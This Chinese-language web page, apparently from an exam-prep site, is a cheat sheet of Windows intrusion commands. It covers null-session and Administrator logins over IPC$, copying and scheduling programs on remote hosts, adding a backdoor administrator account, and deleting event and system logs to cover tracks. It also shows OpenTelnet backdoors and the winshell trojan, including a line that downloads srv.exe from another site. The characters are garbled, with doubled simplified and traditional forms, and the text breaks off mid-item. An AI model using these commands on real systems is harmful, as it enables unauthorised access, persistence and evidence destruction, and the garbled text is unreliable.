網(wǎng)絡(luò)管理員和黑客都應(yīng)知道的幾條命令

字號(hào):

考試大軟考站推薦:網(wǎng)絡(luò)管理員和黑客都應(yīng)知道的幾條命令
    常用的幾條NET命令:
    (與遠(yuǎn)程主機(jī)建立空管連接) net use file://IP/地址\ipc$ "" /use:""
    (以管理員身份登錄遠(yuǎn)程主機(jī)) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"
    (傳送文件到遠(yuǎn)程主機(jī)WINNT目錄下)copy 本機(jī)目錄路徑\程序 file://IP/地址\admin$
    (查看遠(yuǎn)程主機(jī)時(shí)間) net time file://IP/地址
    (定時(shí)啟動(dòng)某個(gè)程序) at file://IP/地址 02:18 readme.exe
    (查看共享) net view file://IP/地址
    (查看netbios工作組列表) nbtstat -A IP地址
    (將遠(yuǎn)程主機(jī)C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"
    (這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
    net localgroup Administrators 用戶名 /add
    (斷開連接) net use file://IP/地址\ipc$ /delete
    掃尾:
    del C:\winnt\system32\logfiles\*.*
    del C:\winnt\ssytem32\config\*.evt
    del C:\winnt\system32\dtclog\*.*
    del C:\winnt\system32\*.log
    del C:\winnt\system32\*.txt
    del C:\winnt\*.txt
    del C:\winnt\*.log
    一、netsvc.exe
    下面的命令分別是列出主機(jī)上的服務(wù)項(xiàng)目、查尋和遠(yuǎn)程啟動(dòng)主機(jī)的“時(shí)間任務(wù)”服務(wù):
    netsvc /list file://IP/地址
    netsvc schedule file://IP/地址 /query
    netsvc file://IP/地址 schedule /start
    二、OpenTelnet.exe
    遠(yuǎn)程啟動(dòng)主機(jī)的Telnet服務(wù),并綁定端口到7878,例如:
    OpenTelnet file://IP/地址 用戶名 密碼 1 7878
    然后就可以telnet到主機(jī)的7878端口,進(jìn)入DOS方式下:
    telnet IP地址 7878 三、winshell.exe
    一個(gè)非常小的木馬(不到6K),telnet到主機(jī)的7878端口,輸入密碼winshell,當(dāng)看到CMD>后,可打下面的命令:
    p Path (查看winshell主程序的路徑信息)
    b reBoot (重新啟動(dòng)機(jī)器)
    d shutDown (關(guān)閉機(jī)器)
    s Shell (執(zhí)行后你就會(huì)看到可愛的“C:\>”)
    x eXit (退出本次登錄會(huì)話,此命令并不終止winshell的運(yùn)行)
    CMD> http://.../srv.exe (通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上)
    四、3389登陸器,GUI方式登錄遠(yuǎn)程主機(jī)的